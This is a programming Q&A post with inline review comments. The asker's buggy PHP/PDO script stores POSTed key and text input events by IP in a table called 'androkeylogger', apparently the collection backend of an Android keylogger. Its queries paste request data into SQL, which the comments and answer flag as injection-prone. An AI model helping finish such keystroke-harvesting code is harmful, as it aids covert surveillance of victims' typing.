I am using PDO MySQL to insert POST data in MySQL server. My code is:
<?php
// Question code, kept exactly as posted. It reads the client address and two POST fields,
// connects through PDO, and per event type means to append to an existing row or create one.
// NOTE(review): the next line has no terminating semicolon, so the script fails with a parse error.
$ip = $_SERVER['REMOTE_ADDR']
// Request-supplied values. $type is only matched against the two case labels below;
// $data is not checked anywhere in this script before it is placed in SQL text.
$type = $_POST['type'];
$data = $_POST['data'];
// NOTE(review): the four values below are bare words, which PHP resolves as constants rather
// than strings (an undefined constant is an Error in PHP 8); presumably quoted strings were meant.
$server = localhost;
$mysql_user = dbuser;
$mysql_pass = passwd;
$useDb = android;
$dsn = sprintf('mysql:host=%s; dbname=%s', $server, $useDb);
$pdo = new PDO($dsn, $mysql_user, $mysql_pass);
// NOTE(review): PDO::ATTR_PERSISTENT and PDO::MYSQL_ATTR_INIT_COMMAND are connection-time
// options; the PHP manual expects them in the options array passed to new PDO(), so setting
// them after construction likely has no effect. Confirm against the manual.
$pdo->setAttribute(PDO::ATTR_TIMEOUT, 1);
$pdo->setAttribute(PDO::ATTR_PERSISTENT, false);
$pdo->setAttribute(PDO::MYSQL_ATTR_INIT_COMMAND, 'SET NAMES utf8');
// Database errors are raised as exceptions; nothing in this script catches them.
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
// Native prepared statements are requested, but they only separate data from SQL when the
// statement text uses placeholders; none of the statements below do.
$pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
switch($type)
{
case 'keyinputevent':
// The SQL is a single-quoted PHP string, so $ip is not interpolated: the literal text "$ip"
// is sent. The typographic quotes are not SQL string delimiters either, so the server does
// not read the value as a string literal.
// If the variables were interpolated instead, request data would be concatenated into the
// statement (SQL injection). The values belong in bound parameters passed to execute().
$query = $pdo->prepare(' SELECT * FROM androkeylogger WHERE ip = ‘$ip’ AND type = ‘keyinputevent’ ');
$query->execute();
// NOTE(review): rowCount() is documented for INSERT/UPDATE/DELETE; for SELECT the result is
// driver-dependent. Confirm before using it as an existence check.
$rows = $query->rowCount();
if ($rows > 0) {
// prepare() only builds a statement; its return value is discarded and execute() is never
// called, so this UPDATE is never sent.
$pdo->prepare(' UPDATE androkeylogger SET data = CONCAT(data, ‘$data’) WHERE ip = ‘$ip’ AND type = ‘keyinputevent’ ');
}
else {
// Same problem: the prepared INSERT is dropped without being executed.
$pdo->prepare(' INSERT into androkeylogger (ip, type, data) VALUES(‘$ip’, ‘$type’, ‘$data’)');
}
break;
case 'textinputevent':
// Same statements as the previous case with a different type literal; the quoting,
// interpolation and missing-execute problems noted there apply unchanged.
$query = $pdo->prepare(' SELECT * FROM androkeylogger WHERE ip = ‘$ip’ AND type = ‘textinputevent’ ');
$query->execute();
$rows = $query->rowCount();
if ($rows > 0) {
$pdo->prepare(' UPDATE androkeylogger SET data = CONCAT(data, ‘$data’) WHERE ip = ‘$ip’ AND type = ‘textinputevent’ ');
}
else {
$pdo->prepare(' INSERT into androkeylogger (ip, type, data) VALUES(‘$ip’, ‘$type’, ‘$data’) ');
}
break;
}
?>
In the if else statements, should I add $pdo->execute(); to execute the query? Any help would be appreciated.
EDIT: I have changed the query variable name in the if..else statements. Is this correct now?
<?php
// Edited version of the question code, kept exactly as posted. The write statements are now
// kept in $query2 and executed, but the SQL text is unchanged from the first attempt.
$ip = $_SERVER['REMOTE_ADDR'];
// Request-supplied values. $type is only matched against the two case labels below;
// $data is not checked anywhere in this script before it is placed in SQL text.
$type = $_POST['type'];
$data = $_POST['data'];
// NOTE(review): the four values below are bare words, which PHP resolves as constants rather
// than strings (an undefined constant is an Error in PHP 8); presumably quoted strings were meant.
$server = localhost;
$mysql_user = dbuser;
$mysql_pass = passwd;
$useDb = android;
$dsn = sprintf('mysql:host=%s;dbname=%s', $server, $useDb);
$pdo = new PDO($dsn, $mysql_user, $mysql_pass);
// NOTE(review): PDO::ATTR_PERSISTENT and PDO::MYSQL_ATTR_INIT_COMMAND are connection-time
// options; the PHP manual expects them in the options array passed to new PDO(), so setting
// them after construction likely has no effect. Confirm against the manual.
$pdo->setAttribute(PDO::ATTR_TIMEOUT, 1);
$pdo->setAttribute(PDO::ATTR_PERSISTENT, false);
$pdo->setAttribute(PDO::MYSQL_ATTR_INIT_COMMAND, 'SET NAMES utf8');
// Database errors are raised as exceptions; nothing in this script catches them.
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
// Native prepared statements are requested, but they only separate data from SQL when the
// statement text uses placeholders; none of the statements below do.
$pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
switch($type)
{
case 'keyinputevent':
// The SQL is a single-quoted PHP string, so $ip is not interpolated: the literal text "$ip"
// is sent. The typographic quotes are not SQL string delimiters either, so the server does
// not read the value as a string literal.
// If the variables were interpolated instead, request data would be concatenated into the
// statement (SQL injection). The values belong in bound parameters passed to execute().
$query = $pdo->prepare(' SELECT * FROM androkeylogger WHERE ip = ‘$ip’ AND type = ‘keyinputevent’ ');
$query->execute();
// NOTE(review): rowCount() is documented for INSERT/UPDATE/DELETE; for SELECT the result is
// driver-dependent. Confirm before using it as an existence check.
$rows = $query->rowCount();
if ($rows > 0) {
$query2 = $pdo->prepare(' UPDATE androkeylogger SET data = CONCAT(data, ‘$data’) WHERE ip = ‘$ip’ AND type = ‘keyinputevent’ ');
}
else {
$query2=$pdo->prepare(' INSERT into androkeylogger (ip, type, data) VALUES(‘$ip’, ‘$type’, ‘$data’)');
}
// Runs whichever statement the branch above prepared. No parameters are bound, so the
// statement text is sent exactly as written in the string literal.
$query2->execute();
break;
case 'textinputevent':
// Same statements as the previous case with a different type literal; the quoting and
// interpolation problems noted there apply unchanged.
$query = $pdo->prepare(' SELECT * FROM androkeylogger WHERE ip = ‘$ip’ AND type = ‘textinputevent’ ');
$query->execute();
$rows = $query->rowCount();
if ($rows > 0) {
$query2 = $pdo->prepare(' UPDATE androkeylogger SET data = CONCAT(data, ‘$data’) WHERE ip = ‘$ip’ AND type = ‘textinputevent’ ');
}
else {
$query2 = $pdo->prepare(' INSERT into androkeylogger (ip, type, data) VALUES(‘$ip’, ‘$type’, ‘$data’) ');
}
$query2->execute();
break;
}
?>
Your queries use curly quotes (‘’) instead of regular quotes (''), which means that your SQL will fail. You're also pasting variables directly into your SQL query, meaning that you're open to SQL injection. Bind your variables instead of pasting them in the query. `SELECT * FROM androkeylogger WHERE ip = ‘$ip’` is not the same as `SELECT * FROM androkeylogger WHERE ip = '$ip'`.